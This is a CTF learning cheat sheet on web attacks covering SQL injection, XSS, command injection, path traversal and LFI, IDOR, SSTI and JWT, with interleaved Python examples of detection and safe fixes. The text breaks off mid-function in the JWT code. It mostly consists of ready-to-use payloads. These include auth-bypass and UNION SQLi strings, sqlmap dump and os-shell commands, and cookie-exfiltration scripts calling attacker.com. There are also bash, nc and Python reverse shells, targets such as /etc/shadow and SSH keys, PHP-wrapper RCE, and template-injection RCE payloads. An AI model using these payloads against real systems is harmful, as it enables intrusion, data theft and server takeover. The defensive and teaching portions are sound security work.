CTF Learning

Web Security

Identify and exploit security flaws in web applications

Essential Tools

  • Burp Suite
  • curl / httpie
  • Developer Tools (F12)
  • sqlmap
  • dirsearch / gobuster
  • nikto

SQL Injection (SQLi) - Complete Guide

Intermediate

A technique for injecting malicious SQL through application input in order to read or manipulate the database.

1. Authentication Bypass

Login Bypass Payloads (sql)
-- Classic bypass
admin'--
admin'#
admin'/*
' OR '1'='1'--
' OR '1'='1'#
" OR "1"="1"--
' OR 1=1--
' OR 'a'='a
') OR ('1'='1

-- Username field:
admin'--
' UNION SELECT 1,1,'admin'--
' OR 1=1 LIMIT 1--

-- Password field (when the password is hashed):
' OR '1'='1
anything' OR '1'='1

2. UNION-Based SQLi

Step-by-step UNION Attack (sql)
-- Step 1: Find the number of columns with ORDER BY
' ORDER BY 1-- (OK)
' ORDER BY 2-- (OK)
' ORDER BY 3-- (OK)
' ORDER BY 4-- (ERROR! → 3 columns)

-- Step 2: Find which columns are displayed
' UNION SELECT 'a','b','c'--
' UNION SELECT 1,2,3--
' UNION SELECT NULL,NULL,NULL--

-- Step 3: Extract database info
' UNION SELECT NULL,VERSION(),NULL--
' UNION SELECT NULL,DATABASE(),NULL--
' UNION SELECT NULL,USER(),NULL--

-- Step 4: List tables
' UNION SELECT NULL,table_name,NULL FROM information_schema.tables WHERE table_schema=database()--

-- Step 5: List columns
' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'--

-- Step 6: Extract data
' UNION SELECT NULL,username,password FROM users--
' UNION SELECT NULL,CONCAT(username,':',password),NULL FROM users--

3. Blind SQL Injection

Used when the application returns no direct output. Data is extracted by observing how the response behaves.

Boolean-Based Blind SQLi (sql)
-- Check whether the parameter is vulnerable
' AND 1=1-- (normal response)
' AND 1=2-- (different response)

-- Extract data character by character
' AND SUBSTRING(database(),1,1)='a'--
' AND SUBSTRING(database(),1,1)='b'--
... until a match is found

-- Binary search to speed this up
' AND ASCII(SUBSTRING(database(),1,1))>64--
' AND ASCII(SUBSTRING(database(),1,1))>96--
' AND ASCII(SUBSTRING(database(),1,1))>112--
...(binary search)

Time-Based Blind SQLi (sql)
-- MySQL
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--

-- PostgreSQL
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--

-- MSSQL
'; WAITFOR DELAY '0:0:5'--
'; IF (1=1) WAITFOR DELAY '0:0:5'--
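Seen from the defender's side, the time-based payloads above leave two traces in the web server's access log: the delay primitive in the request and an abnormal request time. The Python below is an added example, not part of the original cheat sheet: it parses constructed nginx-style log lines (the "combined" format with `$request_time` appended as the last field, an assumed logging configuration), URL-decodes the request target twice so double encoding does not hide the keyword, and correlates the two signals. The client addresses, timestamps and threshold are all constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines: nginx "combined" format with $request_time appended
# as the last field. None of these come from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.012
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /page?id=1'%20AND%20SLEEP(5)--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0" 5.031
10.0.0.5 - - [10/Oct/2023:13:55:47 +0000] "GET /page?id=1'%20AND%20IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.014
10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /page?id=1';%20WAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1" 500 128 "-" "curl/8.0" 5.002
10.0.0.9 - - [10/Oct/2023:13:56:10 +0000] "GET /report?range=5 HTTP/1.1" 200 9000 "-" "Mozilla/5.0" 5.500
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "[^"]*" (?P<rt>\d+(?:\.\d+)?)$'
)

# Delay primitives from the time-based list above (MySQL, PostgreSQL, MSSQL).
DELAY_RE = re.compile(r"\b(?:sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I)

DELAY_THRESHOLD = 3.0  # seconds; derive from the endpoint's normal latency in practice


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["rt"] = float(entry["rt"])
    # Decode twice so %2520-style double encoding cannot hide the keyword.
    entry["decoded"] = unquote_plus(unquote_plus(entry["target"]))
    return entry


def classify(entry):
    """'delay-observed': a delay primitive is present and the request really was slow.
    'payload-only':   a delay primitive is present but no delay occurred
                      (for example the false branch of an IF probe).
    None:             no delay primitive in the request, however slow it was."""
    has_payload = DELAY_RE.search(entry["decoded"]) is not None
    if has_payload and entry["rt"] >= DELAY_THRESHOLD:
        return "delay-observed"
    if has_payload:
        return "payload-only"
    return None


def analyze(log_text):
    """List (line number, client ip, verdict, request_time) for every finding."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        entry = parse_line(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict is not None:
            findings.append((lineno, entry["ip"], verdict, entry["rt"]))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The last sample line is deliberately slow without any payload and produces no finding: request time alone is a weak signal, and a slow report page would otherwise flood the alert queue. Conversely, a payload with no delay is still reported, because the false branch of a conditional SLEEP is exactly what a character-by-character extraction looks like most of the time.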

4. Second-Order SQLi

The payload is stored first and only executed later, when the stored data is used in another query.

Second Order Example (text)
1. Register with the username: admin'--
2. Log in with that username
3. Update the password...
 → Query: UPDATE users SET password='new' WHERE username='admin'--'
 → This changes the real admin's password!
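The login bypass in section 1 and the second-order case in section 4 share one root cause: text that came from a user becomes part of the SQL statement. The following Python/sqlite3 code is an added example, not code from the page or from any project: it places the vulnerable query next to the parameterised one for both the login check and the later UPDATE, using a constructed in-memory `users` table. The usernames and passwords are made up for the demonstration.

```python
import sqlite3


def make_db():
    """In-memory users table with constructed rows (not from the page)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "correct-horse"), ("alice", "wonderland")])
    return con


def login_vulnerable(con, username, password):
    """String formatting: the input becomes SQL text, so admin'-- turns the
    rest of the WHERE clause into a comment and the password is never checked."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Bound parameters: values travel separately from the statement text,
    so admin'-- is compared literally against the username column."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def register(con, username):
    """Registration stores the name correctly even when it contains quotes."""
    con.execute("INSERT OR IGNORE INTO users VALUES (?, ?)", (username, "initial"))


def change_password_vulnerable(con, username, new_password):
    """Second-order flaw: the name read back from the database is trusted and
    concatenated, so a stored admin'-- rewrites the real admin's password."""
    stored = con.execute("SELECT username FROM users WHERE username = ?",
                         (username,)).fetchone()[0]
    con.execute("UPDATE users SET password = '%s' WHERE username = '%s'"
                % (new_password, stored))


def change_password_safe(con, username, new_password):
    """Data that came out of the database is still data: bind it."""
    stored = con.execute("SELECT username FROM users WHERE username = ?",
                         (username,)).fetchone()[0]
    con.execute("UPDATE users SET password = ? WHERE username = ?",
                (new_password, stored))


def password_of(con, username):
    return con.execute("SELECT password FROM users WHERE username = ?",
                       (username,)).fetchone()[0]


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", login_vulnerable(con, "admin'--", "wrong"))
    print("safe:      ", login_safe(con, "admin'--", "wrong"))
```

The second-order functions are the point to study: the INSERT is already parameterised, which is why the quote survives storage intact, and the flaw is entirely in the later UPDATE that treats a value from its own database as trusted. Fixing only the inputs that arrive from the network is not enough.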

5. Automation with SQLMap

SQLMap Commands (bash)
# Basic usage
sqlmap -u "http://target.com/page?id=1"

# With a cookie (if authentication is needed)
sqlmap -u "http://target.com/page?id=1" --cookie="session=abc123"

# POST request
sqlmap -u "http://target.com/login" --data="username=admin&password=test"

# Enumerate databases
sqlmap -u "http://target.com/page?id=1" --dbs

# Enumerate tables
sqlmap -u "http://target.com/page?id=1" -D database_name --tables

# Dump table
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump

# Get shell
sqlmap -u "http://target.com/page?id=1" --os-shell

# Bypass WAF
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment

Cross-Site Scripting (XSS) - Complete Guide

Easy

Injecting malicious script into a web page so that it is executed by the victim's browser.

Reflected XSS

Script from the request (e.g. a URL parameter) is reflected directly into the response.

Stored XSS

Script is stored in the database and executes every time the page is loaded.

DOM-based XSS

Script executes purely on the client side through DOM manipulation.

Basic XSS Payloads

Common Payloads (html)
<!-- Basic -->
<script>alert('XSS')</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>

<!-- Image tag -->
<img src=x onerror="alert('XSS')">
<img src=x onerror=alert('XSS')>
<img/src=x onerror=alert('XSS')>

<!-- SVG -->
<svg onload="alert('XSS')">
<svg/onload=alert('XSS')>

<!-- Body/Input events -->
<body onload="alert('XSS')">
<input onfocus="alert('XSS')" autofocus>
<marquee onstart="alert('XSS')">

<!-- Anchor -->
<a href="javascript:alert('XSS')">click</a>

<!-- Iframe -->
<iframe src="javascript:alert('XSS')">
<iframe srcdoc="<script>alert('XSS')</script>">

Filter Bypass Techniques

Bypassing Filters (html)
<!-- Case variation -->
<ScRiPt>alert('XSS')</ScRiPt>
<SCRIPT>alert('XSS')</SCRIPT>

<!-- Encoding -->
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror="alert(&#39;XSS&#39;)">
<img src=x onerror="alert('XSS')">

<!-- Double encoding -->
%253Cscript%253Ealert('XSS')%253C/script%253E

<!-- Without parentheses -->
<script>alert`XSS`</script>
<script>onerror=alert;throw'XSS'</script>

<!-- Without quotes -->
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>

<!-- Breaking out of attributes -->
"><script>alert('XSS')</script>
'><script>alert('XSS')</script>
</script><script>alert('XSS')</script>

<!-- Using eval -->
<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>

<!-- Template literals -->
<script>alert`XSS`</script>
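Every entry in the bypass list defeats a filter that looks for known bad strings; none of them survives context-aware output encoding. The Python below is an added example, not from the page or any library: it runs a handful of the payloads above through a naive case-sensitive blocklist and through `html.escape`, then checks which results can still start a tag in an HTML text node or break out of a double-quoted attribute. The blocklist contents and the two context checks are constructed for the demonstration.

```python
import html

# Payloads copied from the lists above and used here only as test input.
PAYLOADS = [
    "<script>alert('XSS')</script>",
    "<ScRiPt>alert('XSS')</ScRiPt>",
    "<img src=x onerror=alert(1)>",
    "<svg/onload=alert('XSS')>",
    "<script>alert`XSS`</script>",
    "\"><script>alert('XSS')</script>",
    "<input onfocus=\"alert('XSS')\" autofocus>",
]


def naive_blocklist(value):
    """A case-sensitive blocklist of the kind the bypass list above defeats.
    Matching input is dropped entirely; everything else passes unchanged."""
    for bad in ("<script>", "javascript:", "onerror="):
        if bad in value:
            return ""
    return value


def encode_for_html(value):
    """Output encoding: every character with HTML meaning becomes an entity.
    Correct for text between tags and inside double-quoted attribute values
    (the quotes themselves must already be in the template)."""
    return html.escape(value, quote=True)


def breaks_html_body(rendered):
    """A literal '<' in a text node is what allows a new tag to start."""
    return "<" in rendered


def breaks_quoted_attribute(rendered):
    """A literal '"' is what allows escaping from a double-quoted attribute."""
    return '"' in rendered


def survivors(defence, context_check):
    """Payloads that still break the given context after the defence is applied."""
    return [p for p in PAYLOADS if context_check(defence(p))]


if __name__ == "__main__":
    print("blocklist misses:", survivors(naive_blocklist, breaks_html_body))
    print("encoding misses: ", survivors(encode_for_html, breaks_html_body))
```

Adding case-insensitivity to the blocklist would catch `<ScRiPt>` but still pass `<svg/onload=...>` and `<input onfocus=...>`; each new event handler or tag needs its own entry, whereas encoding neutralises the five characters that matter regardless of what surrounds them. Encoding is context-specific, though: a value placed inside a `<script>` block or a `javascript:` URL needs a different encoder, which is the reason the list above includes payloads for exactly those positions.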

Cookie Stealing Payload

Exfiltrate Cookies (html)
<!-- Send cookies to attacker server -->
<script>
new Image().src='http://attacker.com/steal?c='+document.cookie;
</script>

<script>
fetch('http://attacker.com/steal?c='+document.cookie);
</script>

<script>
document.location='http://attacker.com/steal?c='+document.cookie;
</script>

<!-- Using webhook.site for testing -->
<script>
fetch('https://webhook.site/your-id?c='+document.cookie);
</script>

DOM-based XSS

Vulnerable DOM Sinks (javascript)
// Vulnerable patterns (sinks):
document.write(user_input)
element.innerHTML = user_input
element.outerHTML = user_input
eval(user_input)
setTimeout(user_input, 1000)
setInterval(user_input, 1000)
location = user_input
location.href = user_input

// Sources (where input comes from):
location.search // URL query string
location.hash // URL fragment
document.referrer // Referrer header
document.cookie // Cookies
window.name // Window name

// Example vulnerable code:
var pos = document.URL.indexOf("name=") + 5;
document.write(document.URL.substring(pos, document.URL.length));

// Exploit:
// http://target.com/page#name=<script>alert('XSS')</script>

Command Injection

Intermediate

Execution of operating-system commands through input that is not properly filtered.

Command Injection Payloads (bash)
# Command separators
; ls
| ls
|| ls
& ls
&& ls
`ls`
$(ls)

# Newline
%0als
%0d%0als

# Examples:
# Vulnerable: ping $_GET['ip']
127.0.0.1; cat /etc/passwd
127.0.0.1 | cat /etc/passwd
127.0.0.1 && cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)

# Blind command injection (no output)
; sleep 10 # Time-based
; curl http://attacker.com # Out-of-band
; wget http://attacker.com/$(whoami)

# Getting reverse shell
; bash -i >& /dev/tcp/attacker/4444 0>&1
; nc attacker 4444 -e /bin/bash
; python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Filter Bypass (bash)
# Space bypass
{cat,/etc/passwd}
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
X=$'cat\x20/etc/passwd'&&$X

# Keyword bypass
c'a't /etc/passwd
c"a"t /etc/passwd
c\at /etc/passwd
/???/??t /etc/passwd

# Using wildcards
/???/c?t /???/p?????

# Base64 encoded
echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash
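The filter-bypass list shows why removing spaces or the word `cat` from input is hopeless: the shell offers too many ways to spell the same command. The fix is to never let the input reach a shell. The Python below is an added example, not from the page: it models the `ping $_GET['ip']` pattern as a vulnerable `/bin/sh -c` invocation beside a hardened version that validates the value as an IP address or hostname with the standard `ipaddress` module and a strict pattern, then builds an argv list for `subprocess.run` with no shell at all. The payload list is taken from the two blocks above; the hostname pattern is an assumed allow-list.

```python
import ipaddress
import re
import subprocess

# Inputs from the two lists above (the %0a newline already URL-decoded),
# reused here as test input.
INJECTION_ATTEMPTS = [
    "127.0.0.1; cat /etc/passwd",
    "127.0.0.1 | cat /etc/passwd",
    "127.0.0.1 && cat /etc/passwd",
    "`cat /etc/passwd`",
    "$(cat /etc/passwd)",
    "127.0.0.1\ncat /etc/passwd",
    "127.0.0.1;{cat,/etc/passwd}",
    "127.0.0.1;cat${IFS}/etc/passwd",
]

# Assumed allow-list for DNS names: letters, digits, dot and hyphen only,
# first character alphanumeric so the value can never be parsed as an option.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})")


def build_ping_vulnerable(host):
    """Mirrors `ping $_GET['ip']`: the whole string is handed to a shell,
    so every separator in the lists above is honoured."""
    return ["/bin/sh", "-c", "ping -c 1 " + host]


def build_ping_safe(host):
    """Validate against an allow-list, then build argv with no shell involved.
    Raises ValueError for anything that is not an IP address or a hostname."""
    try:
        return ["ping", "-c", "1", str(ipaddress.ip_address(host))]
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(host):
        return ["ping", "-c", "1", host]
    raise ValueError("rejected host value: %r" % host)


def run_ping(host):
    """Execute without a shell: argv items are passed to ping verbatim, so a
    separator inside the value is just part of an (invalid) hostname."""
    return subprocess.run(build_ping_safe(host), capture_output=True,
                          text=True, timeout=10)


def rejects_all(builder, attempts):
    """True when builder raises ValueError for every attempt."""
    for attempt in attempts:
        try:
            builder(attempt)
        except ValueError:
            continue
        return False
    return True


if __name__ == "__main__":
    print(build_ping_safe("127.0.0.1"))
    print("all payloads rejected:", rejects_all(build_ping_safe, INJECTION_ATTEMPTS))
```

Two details carry the weight here. `subprocess.run` with a list and the default `shell=False` means `;`, `|`, backticks, `$(...)`, `${IFS}` and newlines are never interpreted by anything, so the bypass tricks have nothing to bypass. The allow-list is the second layer: even without a shell, an unvalidated value could still be read by `ping` itself as an option, which is why the hostname pattern refuses a leading hyphen.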

Path Traversal & Local File Inclusion (LFI)

Easy

Accessing files outside the permitted directory by manipulating the path.

Path Traversal Payloads (text)
# Basic traversal
../../../etc/passwd
....//....//....//etc/passwd
..%2f..%2f..%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd

# Double encoding
..%252f..%252f..%252fetc/passwd

# Null byte (older PHP)
../../../etc/passwd%00
../../../etc/passwd%00.jpg

# Important files to read:
/etc/passwd
/etc/shadow (if lucky)
/etc/hosts
/proc/self/environ
/var/log/apache2/access.log
/var/log/apache2/error.log
~/.bash_history
~/.ssh/id_rsa
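The payload list mixes three tricks: plain `../` sequences, percent-encoding (once or twice) to slip past a filter that looks for `../` before decoding, and a `%00` to truncate an appended extension. A defence has to undo the encoding first, normalise second, and only then compare against the allowed base directory. The Python below is an added example, not from the page or any framework: `BASE_DIR` is an assumed web root, and the payloads are the ones listed above, reused as test input.

```python
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/files"  # assumed directory the application may serve from

# Payloads from the list above, reused as test input.
TRAVERSAL_PAYLOADS = [
    "../../../etc/passwd",
    "....//....//....//etc/passwd",
    "..%2f..%2f..%2fetc/passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
    "..%252f..%252f..%252fetc/passwd",
    "../../../etc/passwd%00",
    "../../../etc/passwd%00.jpg",
]


def canonical_decode(user_path, max_rounds=3):
    """Percent-decode until the value stops changing (this is what defeats
    double encoding), then reject an embedded NUL byte outright."""
    decoded = user_path
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    return decoded


def resolve_under_base(user_path, base=BASE_DIR):
    """Return the absolute path for user_path if it stays inside base, else
    raise ValueError. Decode, then normalise, then compare with a trailing
    slash so that /var/www/files2 does not count as inside /var/www/files."""
    decoded = canonical_decode(user_path)
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    if candidate != base and not candidate.startswith(base + "/"):
        raise ValueError("path escapes base directory: %r" % user_path)
    return candidate


def check_all(payloads):
    """Map each payload to 'rejected' or to the contained path it resolves to."""
    results = {}
    for p in payloads:
        try:
            results[p] = resolve_under_base(p)
        except ValueError:
            results[p] = "rejected"
    return results


if __name__ == "__main__":
    for payload, outcome in check_all(TRAVERSAL_PAYLOADS).items():
        print(f"{payload!r:45} -> {outcome}")
```

Note what happens to `....//....//....//etc/passwd`: after normalisation it is simply a path to a non-existent `..../..../....` directory inside the base and is therefore accepted rather than rejected. That payload only works against a filter that strips `../` once and then uses the result; a defence built on normalise-then-compare does not need to recognise it at all, which is the whole point of checking the final path instead of the input string.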
LFI to RCE (php)
// PHP wrappers for LFI
// Read source code:
php://filter/convert.base64-encode/resource=index.php

// RCE via data wrapper:
data://text/plain,<?php system($_GET['cmd']); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

// RCE via input wrapper (POST body contains PHP):
php://input

// Log poisoning:
// 1. Get PHP code into access.log via the User-Agent header
// 2. LFI to /var/log/apache2/access.log
Useful LFI Targets (bash)
# Linux files
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/proc/version
/proc/self/cmdline
/proc/self/environ
/proc/self/fd/[0-9]*
/var/log/apache2/access.log
/var/log/apache2/error.log

# Windows files
C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\Windows\System32\config\SAM
C:\inetpub\logs\LogFiles\

# Application files
.htaccess
config.php
wp-config.php
.env
.git/config

Insecure Direct Object Reference (IDOR)

Easy

Accessing other objects or data without authorization by manipulating the reference parameter.

IDOR Examples (http)
# Numeric IDs
GET /api/user/123/profile → try 124, 125, 1, 0
GET /download?id=456 → try 457, 1
POST /api/order/789/cancel → try other order IDs

# UUIDs (harder but possible)
GET /doc/550e8400-e29b-41d4-a716-446655440000
# Try: increment last digits, or find other UUIDs

# Encoded IDs
GET /profile?id=MTIz (base64 of "123")
# Decode, change, re-encode

# Hashed IDs
GET /reset?token=5d41402abc4b2a76b9719d911017c592
# If MD5 of user ID, generate for other IDs

# In request body
POST /api/transfer
{"from": 123, "to": 456, "amount": 100}
# Change "from" to victim's account

# File access
GET /uploads/user_123/document.pdf
# Try: user_124, user_1, admin

IDOR Hunting Tips
  • Look for every parameter that looks like an ID
  • Test with other users' IDs, ID 0, ID 1 and negative IDs
  • Check for API endpoints in JS files
  • Watch for differing responses (403 vs 200 vs 404)
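Every example above is the same bug: the server looks an object up by the identifier the client sent and never asks whether this client may see it. The Python below is an added example, not from the page or any framework: it models the `/api/order/789` and `/api/transfer` cases with constructed in-memory data, puts the vulnerable lookup beside one scoped to the authenticated user, and returns the same `404` for a foreign object as for a missing one, so the 403-versus-404 difference in the hunting tips has nothing to reveal. Function names and the account balances are made up.

```python
from dataclasses import dataclass


@dataclass
class Order:
    order_id: int
    owner_id: int
    total: int


# Constructed sample data; the IDs are arbitrary.
ORDERS = {
    789: Order(789, owner_id=123, total=100),
    790: Order(790, owner_id=456, total=250),
}


class NotFound(Exception):
    pass


class Forbidden(Exception):
    pass


def get_order_vulnerable(order_id):
    """Fetches by the client-supplied ID alone: whoever guesses 790 gets it."""
    if order_id not in ORDERS:
        raise NotFound()
    return ORDERS[order_id]


def get_order_safe(current_user_id, order_id):
    """Object-level authorization: the lookup is scoped to the caller.
    A foreign order and a missing order get the same NotFound, so the status
    code cannot be used to learn which IDs exist (the 403 vs 404 tip above)."""
    order = ORDERS.get(order_id)
    if order is None or order.owner_id != current_user_id:
        raise NotFound()
    return order


def transfer_safe(accounts, current_user_id, body):
    """The source account is the authenticated user, never the body's "from";
    an explicit mismatching "from" is refused rather than silently corrected."""
    if body.get("from", current_user_id) != current_user_id:
        raise Forbidden()
    amount = body["amount"]
    if amount <= 0 or accounts.get(current_user_id, 0) < amount:
        raise ValueError("invalid amount")
    if body["to"] not in accounts:
        raise NotFound()
    accounts[current_user_id] -= amount
    accounts[body["to"]] += amount


def http_status(handler, *args):
    """Translate the handler outcome into the status an API layer would send."""
    try:
        handler(*args)
        return 200
    except NotFound:
        return 404
    except Forbidden:
        return 403
    except ValueError:
        return 400


if __name__ == "__main__":
    print("vulnerable, user 123 asks for order 790:", http_status(get_order_vulnerable, 790))
    print("safe,       user 123 asks for order 790:", http_status(get_order_safe, 123, 790))
```

The scoped query is the pattern to carry into real code: `WHERE id = ? AND owner_id = ?` (or the ORM equivalent) rather than fetching by `id` and checking ownership afterwards, because the two-step version is the one that gets forgotten in the next endpoint. For the transfer, the identity comes from the session and the body field is at most something to cross-check, never the source of truth.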

Server-Side Template Injection (SSTI)

Hard

Injecting template code that is executed on the server, leading to RCE or data extraction.

Detection Payloads (text)
# Test for the vulnerability:
{{7*7}} → 49 = Jinja2/Twig
${7*7} → 49 = Freemarker/Velocity
#{7*7} → 49 = Ruby ERB
<%= 7*7 %> → 49 = ERB
{{7*'7'}} → 7777777 = Jinja2
{{config}} → Config object = Jinja2

# Polyglot detection:
${{<%[%'"}}%\.
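The detection payloads double as detection signatures for the other side: a legitimate form value almost never contains `{{ ... }}`, `${ ... }` or `<%= ... %>`, so their appearance in request parameters is a strong signal that someone is probing for template injection. The Python below is an added example, not from the page or any WAF product: it scans constructed query strings and form bodies for each syntax family listed above, decodes a second time to catch double encoding, and labels hits that look like the `7*7` arithmetic probes separately from plain template syntax. The sample requests are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# One alternation per syntax family from the detection list above.
TEMPLATE_EXPR = re.compile(
    r"\{\{.*?\}\}"      # {{ ... }}  Jinja2 / Twig
    r"|\{%.*?%\}"       # {% ... %}  Jinja2 / Twig statements
    r"|\$\{.*?\}"       # ${ ... }   Freemarker / Velocity
    r"|#\{.*?\}"        # #{ ... }   Ruby
    r"|<%.*?%>"         # <% ... %>  ERB / JSP
    r"|\[#.*?\]"        # [# ... ]   Freemarker square-bracket syntax
    r"|<#.*?>",         # <# ... >   Freemarker directives
    re.S,
)
# 7*7 and 7*'7' style probes: a number, a star, an optionally quoted number.
ARITHMETIC_PROBE = re.compile(r"\d+\s*\*\s*['\"]?\d+")

# Constructed query strings / form bodies; not captured from any system.
SAMPLE_REQUESTS = [
    "name=alice&bio=hello+there",
    "name=%7B%7B7*7%7D%7D",                 # {{7*7}}
    "name=%257B%257B7*7%257D%257D",         # the same, double-encoded
    "name=${7*7}",
    "comment=%3C%25%3D+7*7+%25%3E",         # <%= 7*7 %>
    "name=${{<%[%'\"}}%\\.",                # the polyglot from the list above
]


def scan_query(query_string):
    """Return (param, matched expression, kind) for every template-looking value.
    parse_qs decodes once; the extra unquote_plus handles double encoding."""
    hits = []
    for param, values in parse_qs(query_string, keep_blank_values=True).items():
        for value in values:
            value = unquote_plus(value)
            for m in TEMPLATE_EXPR.finditer(value):
                kind = ("arithmetic-probe" if ARITHMETIC_PROBE.search(m.group(0))
                        else "template-syntax")
                hits.append((param, m.group(0), kind))
    return hits


def scan_all(requests):
    """Map each request that produced hits to its list of hits."""
    return {q: scan_query(q) for q in requests if scan_query(q)}


if __name__ == "__main__":
    for request, hits in scan_all(SAMPLE_REQUESTS).items():
        print(request, "->", hits)
```

The `template-syntax` class will occasionally fire on legitimate content (a user pasting a code snippet into a comment field, for instance), so it is a review signal rather than a blocking rule; the `arithmetic-probe` class is far more specific and is what a detection engineer would page on. Detection does not replace the fix, which is to pass user input to the template as a variable and never as part of the template source.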
Jinja2 (Flask/Python) Exploitation (python)
# Read file
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

# RCE - Method 1
{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}

# RCE - Method 2
{{ ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['builtins']['eval']("__import__('os').popen('id').read()") }}

# RCE - Method 3 (shorter)
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}

# Popular payload
{{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}
Twig (PHP) Exploitation (php)
# Read file
{{'/etc/passwd'|file_excerpt(1,30)}}

# RCE
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

# RCE - system
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("cat /etc/passwd")}}
Freemarker (Java) Exploitation (java)
# RCE
<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id") }

# Alternative
[#assign ex = 'freemarker.template.utility.Execute'?new()]
${ ex('id') }

Authentication Bypass Techniques

Intermediate

Various ways of getting past authentication mechanisms.

Common Auth Bypass Methods (text)
1. SQL Injection (covered above)

2. Default Credentials
   admin:admin, admin:password, admin:123456
   root:root, root:toor, test:test
   guest:guest

3. JWT Attacks
   - Change algorithm to "none"
   - Bruteforce weak secret
   - Kid parameter injection

4. Session Fixation
   - Inject known session ID

5. Password Reset Flaws
   - Token reuse
   - Predictable tokens
   - Host header injection

6. Mass Assignment
   - Add "role":"admin" or "is_admin":true to request

7. Type Juggling (PHP)
   - "password" == 0 returns true
   - Send integer instead of string

8. Registration bypass
   - Register as admin@target.com (case: Admin@target.com)
JWT Attacks (javascript)
// Original JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZ3Vlc3QiLCJyb2xlIjoibm9ybWFsIn0.signature

// Attack 1: Algorithm None
// Change header to: {"alg":"none","typ":"JWT"}
// Remove signature

// Attack 2: Weak secret bruteforce
john jwt.txt --wordlist=rockyou.txt --format=HMAC-SHA256

// Attack 3: Change payload
// Decode, change "role":"admin", re-encode

// Tools:
// - jwt.io (decode/encode)
// - jwt_tool
// - hashcat -m 16500
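Attack 1 works only because the verifier lets the token choose its own algorithm, and Attack 3 only against a verifier that does not check the signature at all. The Python below is an added example, not from the page or any JWT library: it implements HS256 issuance and verification with the standard `hmac` module, shows the vulnerable verifier that honours `alg: none` beside a safe one that pins the algorithm server-side, and builds the `alg=none` and edited-claims tokens from the list above purely as test input. The secret and claims are constructed.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _json(obj):
    return json.dumps(obj, separators=(",", ":"), sort_keys=True).encode()


def sign_hs256(payload, secret):
    """Issue a token the way the server would."""
    header = b64url_encode(_json({"alg": "HS256", "typ": "JWT"}))
    body = b64url_encode(_json(payload))
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
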